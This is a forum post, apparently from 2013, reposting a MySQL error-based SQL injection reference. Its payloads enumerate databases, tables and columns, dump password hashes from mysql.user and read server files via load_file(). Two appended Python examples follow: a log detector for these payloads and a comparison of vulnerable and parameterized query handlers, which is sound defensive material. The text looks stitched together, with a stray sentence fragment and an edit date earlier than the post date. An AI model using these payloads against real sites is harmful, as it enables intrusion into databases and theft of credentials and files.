Views: 2199 | Replies: 0

MySQL Error-Based Injection Reference (pdf)

Posted on 2013-7-27 11:00:46
This post was last edited by Nightmare on 2013-3-17 14:20

MySQL error-based injection reference (pdf), one post a day...

MySql Error Based Injection Reference
[MySQL Error-Based Injection Reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; works on the vast majority of 5.x versions.
On a small number of versions name_const() itself errors out; for those, use the Method.2 variant given below.
Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)
Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Substitute n sequentially (0, 1, 2, ...).
Number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=mysql
Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=Mysql; substitute n sequentially.
Number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
(0x636F6C756D6E735F70726976=columns_priv)
Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Substitute n sequentially.
Dump row contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Substitute n sequentially.
Read file contents:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini (the literal actually used in the payload above, 0x433A5C5C746573742E617361, decodes to C:\\test.asa). Because only 64 bytes of content can be dumped per error, use substring() to control which bytes are shown.
Thx for reading.
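Every payload in this reference is built from a handful of fixed tokens: the floor(rand(0)*2) ... group by duplicate-key trick, name_const(), information_schema, load_file() and hex-encoded names. That makes the family easy to spot in web server logs. The Python below is an added example, not code from the original post or its PDF: it URL-decodes request query strings, matches those tokens, and decodes the 0x... literals so an analyst can see which schema, table or file path a request pointed at. The access-log lines are constructed (client addresses and the /news.php path are made up, the query strings are copied from the reference above), and the signature names are my own labels.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based techniques in the reference above. The names
# are labels chosen for this example, not a standard taxonomy.
#   dupkey_group_by    - floor(rand(0)*2) ... group by (duplicate-key error trick)
#   name_const         - the name_const() variant (Method.1 payloads)
#   information_schema - schema / table / column enumeration
#   load_file          - file reads via load_file()
#   mysql_user         - credential dumps from mysql.user
SIGNATURES = {
    "dupkey_group_by": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "name_const": re.compile(r"name_const\s*\(", re.I),
    "information_schema": re.compile(
        r"information_schema\s*\.\s*(schemata|tables|columns)", re.I),
    "load_file": re.compile(r"load_file\s*\(", re.I),
    "mysql_user": re.compile(r"mysql\s*\.\s*user", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')


def normalize(raw):
    """URL-decode ('+' and %xx) and collapse whitespace so the regexes see the
    SQL text roughly the way the database would."""
    return re.sub(r"\s+", " ", unquote_plus(raw)).strip()


def decode_hex_literals(text):
    """Decode MySQL 0x... string literals (e.g. 0x6D7973716C -> 'mysql') so the
    analyst sees which schema, table or file a request named."""
    names = []
    for match in HEX_LITERAL.finditer(text):
        digits = match.group(1)
        if len(digits) % 2:            # a string literal has whole bytes
            continue
        try:
            names.append(bytes.fromhex(digits).decode("ascii"))
        except UnicodeDecodeError:     # binary data, not a name; skip it
            continue
    return names


def scan_request(query_string):
    """Return matched signature names and decoded hex literals for one query
    string. An empty 'signatures' list means nothing matched."""
    text = normalize(query_string)
    return {
        "signatures": [name for name, rx in SIGNATURES.items() if rx.search(text)],
        "hex_strings": decode_hex_literals(text),
    }


def scan_access_log(lines):
    """Scan combined-log-format lines; return (line_no, findings) for every line
    whose query string matched at least one signature."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if not match or "?" not in match.group(1):
            continue
        result = scan_request(match.group(1).split("?", 1)[1])
        if result["signatures"]:
            findings.append((line_no, result))
    return findings


# Constructed sample log: one ordinary request, then three carrying payloads
# taken from the reference above.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jul/2013:11:00:46 +0800] "GET /news.php?id=1 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [27/Jul/2013:11:01:02 +0800] "GET /news.php?id=1+and+(select+1+from(select+count(*),'
    'concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x'
    '+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 312',
    '10.0.0.9 - - [27/Jul/2013:11:01:15 +0800] "GET /news.php?id=1+and+exists(select*from+(select*from'
    '(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) HTTP/1.1" 500 298',
    '10.0.0.9 - - [27/Jul/2013:11:01:40 +0800] "GET /news.php?id=1+and+(SELECT+1+FROM+(select+count(*),'
    'concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a'
    '+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 330',
]

if __name__ == "__main__":
    for line_no, result in scan_access_log(SAMPLE_LOG):
        print(line_no, result["signatures"], result["hex_strings"])
```

The normalization step matters more than the regexes: the payloads arrive with `+` for spaces and often with `%28`/`%29` for parentheses, and a detector that matches the raw log line misses them. Decoding the hex literals turns an alert into something actionable, since `0x6D7973716C` tells you the request was aimed at the `mysql` schema.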
You don't have to download it either,
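The whole reference depends on two application defects at once: the request parameter is spliced into the SQL text, and the database driver's error message is echoed back to the client (the `Duplicate entry` text is what carries the result). The following Python is an added example, not code from the original post or its PDF. It uses an in-memory SQLite table as a stand-in for MySQL (assumption: any DB-API driver such as mysql.connector or PyMySQL is used the same way; the table, rows and handler names are invented) and puts the defective handlers next to hardened ones that bind their parameters and return only a generic error, which closes the error channel these payloads rely on.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for a MySQL news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "First post"), (2, "O'Neil on MySQL")])
    return conn


def vulnerable_lookup(conn, raw_id):
    """Both defects at once: raw_id is spliced into the SQL, and the driver's
    error text is handed straight back to the caller (the HTTP client)."""
    try:
        row = conn.execute("SELECT title FROM news WHERE id=" + raw_id).fetchone()
        return {"ok": True, "title": row[0] if row else None}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc)}     # leaks column/schema details


def hardened_lookup(conn, raw_id):
    """Type-check the id, bind it as a parameter, never echo the DB error."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return {"ok": False, "error": "invalid id"}
    try:
        row = conn.execute("SELECT title FROM news WHERE id=?", (news_id,)).fetchone()
        return {"ok": True, "title": row[0] if row else None}
    except sqlite3.Error:
        # Log the exception server-side here; the client learns nothing about the query.
        return {"ok": False, "error": "internal error"}


def vulnerable_search(conn, term):
    """String parameter built by concatenation: a quote in the input breaks the
    statement and the raw parser error goes back to the client."""
    try:
        sql = "SELECT title FROM news WHERE title LIKE '%" + term + "%'"
        return {"ok": True, "titles": [r[0] for r in conn.execute(sql)]}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc)}


def hardened_search(conn, term):
    """Bound parameter: the quote is data, the query succeeds, and any driver
    error is reduced to a generic message."""
    try:
        rows = conn.execute("SELECT title FROM news WHERE title LIKE ?", ("%" + term + "%",))
        return {"ok": True, "titles": [r[0] for r in rows]}
    except sqlite3.Error:
        return {"ok": False, "error": "internal error"}


if __name__ == "__main__":
    db = make_db()
    probe = "1 and 1=no_such_column"      # constructed error-provoking input
    print(vulnerable_lookup(db, probe))   # error text names the column the query tripped on
    print(hardened_lookup(db, probe))     # {'ok': False, 'error': 'invalid id'}
    print(vulnerable_search(db, "O'Neil"))  # parser error leaked
    print(hardened_search(db, "O'Neil"))    # {'ok': True, 'titles': ["O'Neil on MySQL"]}
```

Binding alone is enough to stop the injection; suppressing the error text is what removes the information channel even where some legacy query cannot be parameterized yet, so production deployments want both (on the PHP stacks this reference was written against, that means `display_errors` off and the driver's error strings logged rather than printed).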